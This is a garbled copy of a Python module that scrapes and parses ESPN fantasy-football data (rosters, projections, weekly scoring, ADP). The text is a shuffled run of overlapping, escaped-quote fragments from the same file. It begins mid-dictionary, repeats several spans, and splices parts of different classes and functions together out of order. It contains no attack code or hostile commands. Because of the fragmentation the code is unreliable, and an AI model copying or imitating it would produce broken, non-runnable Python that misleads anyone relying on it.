\"Det\", 9: \"GB\", 10:", "\"Den\", 8: \"Det\", 9: \"GB\", 10: \"Ten\", 11: \"Ind\", 12: \"KC\", 13: \"Oak\",", "\"k\", \"QB\", \"RB\", \"WR\", \"TE\", \"K\", \"D/ST\", \"DST\", ]: if pos in [\"DST\",", "player[header] = val players.append(player) elif pos.lower() == \"k\": for row in soup.findAll(\"tr\", {\"class\":", "= {\"source\": \"espn\"} tds = row.find_all(\"td\") # tds[0]: rank player[\"source_position_rank\"] = tds[0].text #", "{}\".format(pos)) if offset > max_offset.get(pos): raise ValueError(\"invalid offset {}\".format(offset)) if offset % 40", "Args: pos(str): Returns: str \"\"\" if pos in [ \"qb\", \"rb\", \"wr\", \"te\",", "team_code): \"\"\" Gets list of NFL players from ESPN.com Args: team_code: str 'DEN',", "= tds[0].text # tds[1]: name/team/pos link, navstr = list(tds[1].children)[0:2] player[\"source_player_name\"] = link.text player[\"source_player_team\"],", "player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_dst(content): \"\"\"", "scoring_type in [\"PPR\", \"STANDARD\"]: for rank_type in [\"rank\", \"auctionValue\"]: key = scoring_type.lower() +", "def weekly_scoring_dst(content): \"\"\" Parses weekly scoring page for dst Args: content(str): HTML Returns:", "= BeautifulSoup(content, \"lxml\") tbl = soup.select(\"table#playertable_0\")[0] for row in tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}): tds", "ESPN.com for football stats \"\"\" @staticmethod def _check_pos(pos): \"\"\" Makes sure pos is", "Site from sportscraper.scraper import RequestScraper FANTASY_TEAMS = { 1: \"Atl\", 2: \"Buf\", 3:", "= { \"slotCategoryId\": slot_categories[pos], \"startIndex\": offset, \"seasonId\": season_year, } else: params = {\"slotCategoryId\":", "Parser: \"\"\" Parse ESPN.com for football stats \"\"\" def __init__(self): \"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler())", "one column so have to remove & split vals = [self._val(td.text) for td", "player dict Args: content: HTML of espn nfl team roster page Returns: list", "football stats \"\"\" @staticmethod def _check_pos(pos): \"\"\" Makes sure pos is valid and", "\"\"\" @staticmethod def _check_pos(pos): \"\"\" Makes sure pos is valid and uppercase Args:", "\"D/ST\", \"DST\", ]: if pos in [\"DST\", \"dst\"]: pos = \"D/ST\" return pos.upper()", "HTML Returns: list: of dict \"\"\" # TODO: adapt for kicker results =", "# TODO: adapt for kicker results = [] headers = [ \"c_a\", \"pass_yds\",", "@staticmethod def weekly_scoring_k(content): \"\"\" Parses weekly scoring page for kickers Args: content (str):", "{\"source\": \"espn\", \"source_player_position\": pos} tds = row.find_all(\"td\") # tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a>", "player[\"source_team_code\"] = match.group(1) # tds[2]: <td>Arkansas</td> player[\"college\"] = tds[2].text # add to list", "} class Scraper(RequestScraper): \"\"\" Scrape ESPN.com for football stats \"\"\" @staticmethod def _check_pos(pos):", "else: params[\"seasonTotals\"] = \"true\" return self.get(url, params=params, encoding=\"latin1\") def team_roster(self, team_code): \"\"\" Gets", "name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] = tds[1].text link = row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")}) if link: match =", "6, \"dst\": 16, \"k\": 17} if position.lower() not in poscode: raise ValueError(\"invalid position:", "\"\"\" Gets page with all players by position Args: pos(str): qb, rb, wr,", "class Agent: \"\"\" Combines common scraping/parsing tasks \"\"\" def __init__(self, scraper=None, parser=None, cache_name=\"espn-agent\"):", "3 offset: int 0, 40, 80, etc. Returns: HTML string TODO: revise based", "_val(val): \"\"\" Converts non-numeric value to numeric 0 Args: val: Returns: number \"\"\"", "\"defaultPositionId\", \"firstName\", \"id\", \"lastName\", \"proTeamId\", ] api_player = {k: v for k, v", "{\"href\": re.compile(r\"/player/_/\")}) if link: match = re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if match: player[\"source_player_id\"] = match.group(1)", "default 'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper: self._s = scraper else: self._s = Scraper(cache_name=cache_name)", "\"\"\" content = self._s.adp(season_year) return self._p.adp(content) class Xref(Site): \"\"\" Cross-reference source players with", "{\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17} if", "vals): player[header] = val players.append(player) elif pos.lower() == \"k\": for row in soup.findAll(\"tr\",", "4, \"te\": 6, \"dst\": 16, \"k\": 17} if position.lower() not in poscode: raise", "source_name=\"espn\"): \"\"\" Args: source_name(str): either 'espn' or 'espn_fantasy' \"\"\" super().__init__() self.source_name = source_name", "projections(self, pos, season_year=None, week=0, offset=0): \"\"\" Gets page with projections by position Args:", "Creates Agent object Args: scraper(espn.Scraper): default None parser(espn.Parser): default None cache_name(str): default 'espn-agent'", "navstr = list(tds[1].children)[0:2] player[\"source_player_name\"] = link.text player[\"source_player_team\"], player[ \"source_player_position\" ] = navstr.split()[-2:] player[\"source_player_id\"]", "\"TE\", \"K\", \"D/ST\", \"DST\", ]: if pos in [\"DST\", \"dst\"]: pos = \"D/ST\"", "based on new URL \"\"\" pos = pos.lower() slot_categories = {\"qb\": 0, \"rb\":", "{}\".format(offset)) # https://fantasy.espn.com/football/players/projections url = \"http://games.espn.com/ffl/tools/projections?\" if season_year: params = { \"slotCategoryId\": slot_categories[pos],", "match = re.search(r\"name/(\\w+)/\", link[\"href\"]) if match: player[\"source_team_code\"] = match.group(1) # tds[2]: <td>Arkansas</td> player[\"college\"]", "[] soup = BeautifulSoup(content, \"lxml\") if pos.lower() in [\"qb\", \"rb\", \"wr\", \"te\", \"flex\"]:", "[] soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): link = row.find(\"a\", {\"href\":", "tds: player = dict(zip(headers, tds)) # name, team, position nametd = row.find(\"td\", {\"id\":", "pos not in slot_categories.keys(): raise ValueError(\"invalid pos {}\".format(pos)) if offset > max_offset.get(pos): raise", "parser=None, cache_name=\"espn-agent\"): \"\"\" Creates Agent object Args: scraper(espn.Scraper): default None parser(espn.Parser): default None", "Parser() def adp(self, season_year): \"\"\" Gets season ADP data Args: season_year(int): 2018, 2019,", "in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"} tds = row.find_all(\"td\") # tds[0]:", "football stats \"\"\" def __init__(self): \"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def _val(val): \"\"\" Converts", "if len(tds) != 8: continue player[\"source_player_position\"] = tds[2].text player[\"source_player_name\"] = link.text player[\"source_player_id\"] =", "\"\"\" if pos in [ \"qb\", \"rb\", \"wr\", \"te\", \"dst\", \"d/st\", \"k\", \"QB\",", "\"\"\" url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url, encoding=\"latin1\") def weekly_scoring(self, season_year, week, position): \"\"\"", "headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec_rec\", \"rec_yds\", \"rec_td\",", "def weekly_scoring_k(content): \"\"\" Parses weekly scoring page for kickers Args: content (str): HTML", "None cache_name(str): default 'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if scraper: self._s = scraper else: self._s", "position): \"\"\" Gets weekly fantasy scoring page Args: season_year (int): 2017, 2016, etc.", "= row.find(\"td\", {\"id\": re.compile(r\"playername\")}) for child in nametd.children: if isinstance(child, NavigableString): player[\"source_player_team\"], player[", "\"te\": 6, \"dst\": 16, \"k\": 17} if position.lower() not in poscode: raise ValueError(\"invalid", "else: raise ValueError(\"invalid position: {}\".format(pos)) def adp(self, season_year): \"\"\" Gets adp data Args:", "{}\".format(position)) # https://fantasy.espn.com/football/leaders url = \"http://games.espn.com/ffl/leaders?&\" params = { \"scoringPeriodId\": week, \"seasonId\": season_year,", "players.append(player) return players @staticmethod def team_roster(content): \"\"\" Parses team roster page into list", "with all players by position Args: pos(str): qb, rb, wr, te, k, etc.", "Agent object Args: scraper(espn.Scraper): default None parser(espn.Parser): default None cache_name(str): default 'espn-agent' \"\"\"", "classes = set(row.attrs.get(\"class\", [])) if class_matches.intersection(classes): player = {\"source\": \"espn\", \"source_player_position\": pos} tds", "{\"id\": re.compile(r\"playername\")}) for child in nametd.children: if isinstance(child, NavigableString): player[\"source_player_team\"], player[ \"source_player_position\" ]", "in slot_categories.keys(): raise ValueError(\"invalid pos {}\".format(pos)) if offset > max_offset.get(pos): raise ValueError(\"invalid offset", "Cross-reference source players with other names/ids \"\"\" def __init__(self, source_name=\"espn\"): \"\"\" Args: source_name(str):", "# this does include some basic fantasy data # espn_fantasy is mostly about", "fantasy scoring page Args: season_year (int): 2017, 2016, etc. week (int): 1 through", "except ValueError: pass return players @staticmethod def weekly_scoring(content): \"\"\" Parses weekly scoring page", "2: \"Buf\", 3: \"Chi\", 4: \"Cin\", 5: \"Cle\", 6: \"Dal\", 7: \"Den\", 8:", "weekly scoring page for kickers Args: content (str): HTML Returns: list: of dict", "slot_categories[pos], \"startIndex\": offset} if week: params[\"scoringPeriodId\"] = week else: params[\"seasonTotals\"] = \"true\" return", "for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"} tds = row.find_all(\"td\")", "ValueError(\"invalid pos {}\".format(pos)) if offset > max_offset.get(pos): raise ValueError(\"invalid offset {}\".format(offset)) if offset", "item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type] except KeyError: api_player[key] = None vals.append(api_player) return vals def projections(self,", "weekly_scoring_dst(content): \"\"\" Parses weekly scoring page for dst Args: content(str): HTML Returns: list:", "TODO: adapt for kicker results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\",", "season_year(int): 2018, 2019, etc. Returns: list: of dict \"\"\" content = self._s.adp(season_year) return", "return self.get_json(url) def players_position(self, pos): \"\"\" Gets page with all players by position", "(str): HTML Returns: list: of dict \"\"\" # TODO: adapt for kicker results", "\"K\", \"D/ST\", \"DST\", ]: if pos in [\"DST\", \"dst\"]: pos = \"D/ST\" return", "key = scoring_type.lower() + \"_\" + rank_type try: api_player[key] = item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type]", "\"Dal\", 7: \"Den\", 8: \"Det\", 9: \"GB\", 10: \"Ten\", 11: \"Ind\", 12: \"KC\",", "33: \"Bal\", 34: \"Hou\", } class Scraper(RequestScraper): \"\"\" Scrape ESPN.com for football stats", "self._s.adp(season_year) return self._p.adp(content) class Xref(Site): \"\"\" Cross-reference source players with other names/ids \"\"\"", "15: \"Mia\", 16: \"Min\", 17: \"NE\", 18: \"NO\", 19: \"NYG\", 20: \"NYJ\", 21:", "to numeric 0 Args: val: Returns: number \"\"\" if \"--\" in val: return", "\"\"\" if \"--\" in val: return 0 return val @staticmethod def adp(content): \"\"\"", "\"rec_td\", \"fantasy_points_ppr\", ] for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"}", "qb, rb, wr, te, k, etc. season_year: int 2017, 2016 week: int 1,", "url = \"http://games.espn.com/ffl/leaders?&\" params = { \"scoringPeriodId\": week, \"seasonId\": season_year, \"slotCategoryId\": position, }", "BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): class_matches = set([\"oddrow\", \"evenrow\"]) classes = set(row.attrs.get(\"class\",", "def players_position(self, pos): \"\"\" Gets page with all players by position Args: pos(str):", "encoding=\"latin1\") def weekly_scoring(self, season_year, week, position): \"\"\" Gets weekly fantasy scoring page Args:", "api_player[key] = None vals.append(api_player) return vals def projections(self, content, pos): \"\"\" Parses ESPN", "\"http://games.espn.com/ffl/leaders?&\" params = { \"scoringPeriodId\": week, \"seasonId\": season_year, \"slotCategoryId\": position, } return self.get(url,", "in one column so have to remove & split player[\"fantasy_points_ppr\"] = self._val(tds[-1].text) players.append(player)", "row.find_all(\"td\") # tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] = tds[0].text link = row.find(\"a\",", "team roster page into list of player dict Args: content: HTML of espn", "child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_dst(content): \"\"\" Parses weekly", "return results @staticmethod def weekly_scoring_k(content): \"\"\" Parses weekly scoring page for kickers Args:", "list: of dict \"\"\" # TODO: adapt for kicker results = [] headers", "parsed JSON \"\"\" url = ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return self.get_json(url) def players_position(self,", "navstr.split()[-2:] player[\"source_player_id\"] = link.attrs.get(\"playerid\") # loop through stats # they have attempts/completions in", "names/ids \"\"\" def __init__(self, source_name=\"espn\"): \"\"\" Args: source_name(str): either 'espn' or 'espn_fantasy' \"\"\"", "HTML of espn nfl team roster page Returns: list of dict \"\"\" players", "= {\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset} if week: params[\"scoringPeriodId\"] = week else: params[\"seasonTotals\"] =", "\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset, \"seasonId\": season_year, } else: params = {\"slotCategoryId\": slot_categories[pos], \"startIndex\":", "number \"\"\" if \"--\" in val: return 0 return val @staticmethod def adp(content):", "\"lxml\") tbl = soup.select(\"table#playertable_0\")[0] for row in tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}): tds = [td.text", "match: player[\"source_player_id\"] = match.group(1) # tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/ # name/jax/jacksonville-jaguars\"><NAME></a></td> player[\"source_team_name\"] = tds[1].text", "elif isinstance(child, Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod", "tasks \"\"\" def __init__(self, scraper=None, parser=None, cache_name=\"espn-agent\"): \"\"\" Creates Agent object Args: scraper(espn.Scraper):", "\"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec_rec\", \"rec_yds\", \"rec_td\", \"rec_tar\", \"tpc\", \"fumble\", \"misc_td\", \"fpts\", ]", "str \"\"\" if pos in [ \"qb\", \"rb\", \"wr\", \"te\", \"dst\", \"d/st\", \"k\",", "{ \"slotCategoryId\": slot_categories[pos], \"startIndex\": offset, \"seasonId\": season_year, } else: params = {\"slotCategoryId\": slot_categories[pos],", "for scraping, parsing espn football data # this does include some basic fantasy", "class_matches.intersection(classes): player = {\"source\": \"espn\", \"source_player_position\": pos} tds = row.find_all(\"td\") # tds[0]: <a", "params = { \"slotCategoryId\": slot_categories[pos], \"startIndex\": offset, \"seasonId\": season_year, } else: params =", "\"\"\" Creates Agent object Args: scraper(espn.Scraper): default None parser(espn.Parser): default None cache_name(str): default", "f\"segments/0/leaguedefaults/1?view=kona_player_info\" ) return self.get_json(url) def players_position(self, pos): \"\"\" Gets page with all players", "\"k\": 17} max_offset = {\"qb\": 120, \"rb\": 240, \"wr\": 360, \"te\": 160, \"dst\":", "remove & split vals = [self._val(td.text) for td in tds[3:]] for header, val", "self.get(url, encoding=\"latin1\") def weekly_scoring(self, season_year, week, position): \"\"\" Gets weekly fantasy scoring page", "{\"source\": \"espn\"} tds = row.find_all(\"td\") if len(tds) != 8: continue player[\"source_player_position\"] = tds[2].text", "Xref(Site): \"\"\" Cross-reference source players with other names/ids \"\"\" def __init__(self, source_name=\"espn\"): \"\"\"", "<td>Arkansas</td> player[\"college\"] = tds[2].text # add to list players.append(player) return players @staticmethod def", "fantasy teams # NOTE: trouble accessing data in offseason # will have to", "some basic fantasy data # espn_fantasy is mostly about managing fantasy teams #", "link, navstr = list(tds[1].children)[0:2] player[\"source_player_name\"] = link.text player[\"source_player_team\"], player[ \"source_player_position\" ] = navstr.split()[-2:]", "tds[3:]] for header, val in zip(headers, tds[2].text.split(\"/\") + vals): player[header] = val players.append(player)", "int 2017, 2016 week: int 1, 2, 3 offset: int 0, 40, 80,", "URL \"\"\" poscode = {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\":", "row.find_all(\"td\") if len(tds) != 8: continue player[\"source_player_position\"] = tds[2].text player[\"source_player_name\"] = link.text player[\"source_player_id\"]", "soup = BeautifulSoup(content, \"lxml\") tbl = soup.select(\"table#playertable_0\")[0] for row in tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}):", "import Site from sportscraper.scraper import RequestScraper FANTASY_TEAMS = { 1: \"Atl\", 2: \"Buf\",", "tds[0]: rank player[\"source_position_rank\"] = tds[0].text # tds[1]: name/team/pos link, navstr = list(tds[1].children)[0:2] player[\"source_player_name\"]", "Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results class Agent: \"\"\"", "\"\"\" Parses weekly scoring page Args: content (str): HTML Returns: list: of dict", "stats \"\"\" @staticmethod def _check_pos(pos): \"\"\" Makes sure pos is valid and uppercase", "= child.attrs.get(\"playerid\") results.append(player) return results class Agent: \"\"\" Combines common scraping/parsing tasks \"\"\"", "@staticmethod def weekly_scoring(content): \"\"\" Parses weekly scoring page Args: content (str): HTML Returns:", "11: \"Ind\", 12: \"KC\", 13: \"Oak\", 14: \"LAR\", 15: \"Mia\", 16: \"Min\", 17:", "list(tds[1].children)[0:2] player[\"source_player_name\"] = link.text player[\"source_player_team\"], player[ \"source_player_position\" ] = navstr.split()[-2:] player[\"source_player_id\"] = link.attrs.get(\"playerid\")", "player[\"college\"] = tds[2].text # add to list players.append(player) return players @staticmethod def team_roster(content):", "19: \"NYG\", 20: \"NYJ\", 21: \"Phi\", 22: \"Ari\", 23: \"Pit\", 24: \"LAC\", 25:", "40, 80, etc. Returns: HTML string TODO: revise based on new URL \"\"\"", "== \"k\": for row in soup.findAll(\"tr\", {\"class\": \"pncPlayerRow\"}): player = {\"source\": \"espn\"} tds", "nametd = row.find(\"td\", {\"id\": re.compile(r\"playername\")}) for child in nametd.children: if isinstance(child, NavigableString): player[\"source_player_team\"],", "2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] = tds[0].text link = row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")}) if link: match =", "player[\"source_team_name\"] = tds[1].text link = row.find(\"a\", {\"href\": re.compile(r\"/team/_/name\")}) if link: match = re.search(r\"name/(\\w+)/\",", "position nametd = row.find(\"td\", {\"id\": re.compile(r\"playername\")}) for child in nametd.children: if isinstance(child, NavigableString):", "= [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec_rec\",", "Returns: str \"\"\" if pos in [ \"qb\", \"rb\", \"wr\", \"te\", \"dst\", \"d/st\",", "return self._p.adp(content) class Xref(Site): \"\"\" Cross-reference source players with other names/ids \"\"\" def", "\"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17} if position.lower() not", "\"rec_tar\", \"tpc\", \"fumble\", \"misc_td\", \"fpts\", ] soup = BeautifulSoup(content, \"lxml\") tbl = soup.select(\"table#playertable_0\")[0]", "elif isinstance(child, Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results class", "isinstance(child, Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results class Agent:", "= self._s.adp(season_year) return self._p.adp(content) class Xref(Site): \"\"\" Cross-reference source players with other names/ids", "= [] for item in content[\"players\"]: tl_wanted = [ \"defaultPositionId\", \"firstName\", \"id\", \"lastName\",", "Agent: \"\"\" Combines common scraping/parsing tasks \"\"\" def __init__(self, scraper=None, parser=None, cache_name=\"espn-agent\"): \"\"\"", "pos.lower() slot_categories = {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16,", "results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\",", "of player dict Args: content: HTML of espn nfl team roster page Returns:", "re.compile(r\"playername\")}) for child in nametd.children: if isinstance(child, NavigableString): player[\"source_player_team\"], player[ \"source_player_position\" ] =", "[self._val(td.text) for td in tds[3:]] for header, val in zip(headers, tds[2].text.split(\"/\") + vals):", "URL \"\"\" pos = pos.lower() slot_categories = {\"qb\": 0, \"rb\": 2, \"wr\": 4,", "season approaches \"\"\" import logging import re from bs4 import BeautifulSoup, NavigableString, Tag", "def team_roster(self, team_code): \"\"\" Gets list of NFL players from ESPN.com Args: team_code:", "Args: content: HTML string Returns: list of dict \"\"\" players = [] soup", "players_position(content, pos): \"\"\" Parses page of ESPN players by position Args: content: pos:", "Returns: list: of dict \"\"\" results = [] headers = [ \"c_a\", \"pass_yds\",", "= BeautifulSoup(content, \"lxml\") if pos.lower() in [\"qb\", \"rb\", \"wr\", \"te\", \"flex\"]: headers =", "= link.text player[\"source_player_team\"], player[ \"source_player_position\" ] = navstr.split()[-2:] player[\"source_player_id\"] = link.attrs.get(\"playerid\") # loop", "\"\"\" Scrape ESPN.com for football stats \"\"\" @staticmethod def _check_pos(pos): \"\"\" Makes sure", "BeautifulSoup, NavigableString, Tag from namematcher.xref import Site from sportscraper.scraper import RequestScraper FANTASY_TEAMS =", "80, etc. Returns: HTML string TODO: revise based on new URL \"\"\" pos", "to remove & split player[\"fantasy_points_ppr\"] = self._val(tds[-1].text) players.append(player) else: pass return players @staticmethod", "for td in tds[3:]] for header, val in zip(headers, tds[2].text.split(\"/\") + vals): player[header]", "12: \"KC\", 13: \"Oak\", 14: \"LAR\", 15: \"Mia\", 16: \"Min\", 17: \"NE\", 18:", "nfl team roster page Returns: list of dict \"\"\" players = [] soup", "Args: season_year(int): 2018, 2019, etc. Returns: list: of dict \"\"\" content = self._s.adp(season_year)", "ADP Args: content: Returns: list of dict \"\"\" vals = [] for item", "column so have to remove & split vals = [self._val(td.text) for td in", "14: \"LAR\", 15: \"Mia\", 16: \"Min\", 17: \"NE\", 18: \"NO\", 19: \"NYG\", 20:", "\"\"\" pos = pos.lower() slot_categories = {\"qb\": 0, \"rb\": 2, \"wr\": 4, \"te\":", "\"rec_td\", \"rec_tar\", \"tpc\", \"fumble\", \"misc_td\", \"fpts\", ] soup = BeautifulSoup(content, \"lxml\") tbl =", "# 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"] = tds[0].text link = row.find(\"a\", {\"href\": re.compile(r\"/player/_/\")}) if link: match", "\"espn\", \"source_player_position\": pos} tds = row.find_all(\"td\") # tds[0]: <a href=\"http://www.espn.com/nfl/player/_/id/ # 2574511/brandon-allen\"><NAME></a> player[\"source_player_name\"]", "season_year: params = { \"slotCategoryId\": slot_categories[pos], \"startIndex\": offset, \"seasonId\": season_year, } else: params", "season_year(int): 2019, etc. Returns: dict: parsed JSON \"\"\" url = ( f\"http://fantasy.espn.com/apis/v3/games/ffl/seasons/{season_year}/\" f\"segments/0/leaguedefaults/1?view=kona_player_info\"", "link: match = re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if match: player[\"source_player_id\"] = match.group(1) # tds[1]: <td><a", "if scraper: self._s = scraper else: self._s = Scraper(cache_name=cache_name) if parser: self._p =", "player[\"source_player_team\"], player[ \"source_player_position\" ] = navstr.split()[-2:] player[\"source_player_id\"] = link.attrs.get(\"playerid\") # loop through stats", "logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def _val(val): \"\"\" Converts non-numeric value to numeric 0 Args: val:", "val: Returns: number \"\"\" if \"--\" in val: return 0 return val @staticmethod", "\"startIndex\": offset} if week: params[\"scoringPeriodId\"] = week else: params[\"seasonTotals\"] = \"true\" return self.get(url,", "projections by position Args: pos: str qb, rb, wr, te, k, etc. season_year:", "string \"\"\" url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url, encoding=\"latin1\") def weekly_scoring(self, season_year, week, position):", "stats # they have attempts/completions in one column so have to remove &", "\"rec_yds\", \"rec_td\", \"rec_tar\", \"tpc\", \"fumble\", \"misc_td\", \"fpts\", ] soup = BeautifulSoup(content, \"lxml\") tbl", "isinstance(child, Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def", "34: \"Hou\", } class Scraper(RequestScraper): \"\"\" Scrape ESPN.com for football stats \"\"\" @staticmethod", "\"WR\", \"TE\", \"K\", \"D/ST\", \"DST\", ]: if pos in [\"DST\", \"dst\"]: pos =", "page Args: season_year (int): 2017, 2016, etc. week (int): 1 through 17 position", "@staticmethod def weekly_scoring_dst(content): \"\"\" Parses weekly scoring page for dst Args: content(str): HTML", "HTML string TODO: revise based on new URL \"\"\" pos = pos.lower() slot_categories", "if pos in [\"DST\", \"dst\"]: pos = \"D/ST\" return pos.upper() else: raise ValueError(\"invalid", "split player[\"fantasy_points_ppr\"] = self._val(tds[-1].text) players.append(player) else: pass return players @staticmethod def players_position(content, pos):", "def __init__(self, source_name=\"espn\"): \"\"\" Args: source_name(str): either 'espn' or 'espn_fantasy' \"\"\" super().__init__() self.source_name", "content[\"players\"]: tl_wanted = [ \"defaultPositionId\", \"firstName\", \"id\", \"lastName\", \"proTeamId\", ] api_player = {k:", "scoring page Args: season_year (int): 2017, 2016, etc. week (int): 1 through 17", "page for kickers Args: content (str): HTML Returns: list: of dict \"\"\" #", "class_matches = set([\"oddrow\", \"evenrow\"]) classes = set(row.attrs.get(\"class\", [])) if class_matches.intersection(classes): player = {\"source\":", "te, k, etc. Returns: str \"\"\" url = \"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos), encoding=\"latin1\") def", "# espn.py # classes for scraping, parsing espn football data # this does", "\"startIndex\": offset, \"seasonId\": season_year, } else: params = {\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset} if", "\"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec_rec\", \"rec_yds\", \"rec_td\", \"rec_tar\", \"tpc\", \"fumble\", \"misc_td\", \"fpts\",", "Args: val: Returns: number \"\"\" if \"--\" in val: return 0 return val", "self._val(tds[-1].text) players.append(player) else: pass return players @staticmethod def players_position(content, pos): \"\"\" Parses page", "= re.search(r\"\\/id\\/([0-9]+)\", link[\"href\"]) if match: player[\"source_player_id\"] = match.group(1) # tds[1]: <td><a href=\"http://www.espn.com/nfl/team/_/ #", "Args: scraper(espn.Scraper): default None parser(espn.Parser): default None cache_name(str): default 'espn-agent' \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) if", "weekly_scoring(content): \"\"\" Parses weekly scoring page Args: content (str): HTML Returns: list: of", "data # espn_fantasy is mostly about managing fantasy teams # NOTE: trouble accessing", "def __init__(self): \"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod def _val(val): \"\"\" Converts non-numeric value to", "= scraper else: self._s = Scraper(cache_name=cache_name) if parser: self._p = parser else: self._p", "\"\"\" Parse ESPN.com for football stats \"\"\" def __init__(self): \"\"\" \"\"\" logging.getLogger(__name__).addHandler(logging.NullHandler()) @staticmethod", "Args: content (str): HTML Returns: list: of dict \"\"\" results = [] headers", "int 1, 2, 3 offset: int 0, 40, 80, etc. Returns: HTML string", "row in soup.find_all(\"tr\"): class_matches = set([\"oddrow\", \"evenrow\"]) classes = set(row.attrs.get(\"class\", [])) if class_matches.intersection(classes):", "players with other names/ids \"\"\" def __init__(self, source_name=\"espn\"): \"\"\" Args: source_name(str): either 'espn'", "offseason # will have to revisit this module as season approaches \"\"\" import", "Args: season_year (int): 2017, 2016, etc. week (int): 1 through 17 position (str):", "roster page into list of player dict Args: content: HTML of espn nfl", "7: \"Den\", 8: \"Det\", 9: \"GB\", 10: \"Ten\", 11: \"Ind\", 12: \"KC\", 13:", "if \"--\" in val: return 0 return val @staticmethod def adp(content): \"\"\" Parses", "TODO: adapt for dst results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\",", "pos: Returns: list: of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\")", "\"id\", \"lastName\", \"proTeamId\", ] api_player = {k: v for k, v in item[\"player\"].items()", "\"source_player_position\" ] = child.string.split()[1:3] elif isinstance(child, Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\")", "return 0 return val @staticmethod def adp(content): \"\"\" Parses season-long ADP Args: content:", "soup.select(\"table#playertable_0\")[0] for row in tbl.find_all(\"tr\", {\"id\": re.compile(r\"plyr\")}): tds = [td.text for td in", "> 0: raise ValueError(\"invalid offset {}\".format(offset)) # https://fantasy.espn.com/football/players/projections url = \"http://games.espn.com/ffl/tools/projections?\" if season_year:", "encoding=\"latin1\") def team_roster(self, team_code): \"\"\" Gets list of NFL players from ESPN.com Args:", "HTML Returns: list: of dict \"\"\" # TODO: adapt for dst results =", "for k, v in item[\"player\"].items() if k in tl_wanted} for scoring_type in [\"PPR\",", "scraper=None, parser=None, cache_name=\"espn-agent\"): \"\"\" Creates Agent object Args: scraper(espn.Scraper): default None parser(espn.Parser): default", "\"\"\" Parses season-long ADP Args: content: Returns: list of dict \"\"\" vals =", "params=params) class Parser: \"\"\" Parse ESPN.com for football stats \"\"\" def __init__(self): \"\"\"", "\"Oak\", 14: \"LAR\", 15: \"Mia\", 16: \"Min\", 17: \"NE\", 18: \"NO\", 19: \"NYG\",", "etc. week (int): 1 through 17 position (str): 'qb', 'wr', etc. Returns: str:", "list of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") for row", "row.find_all(\"td\") # tds[0]: rank player[\"source_position_rank\"] = tds[0].text # tds[1]: name/team/pos link, navstr 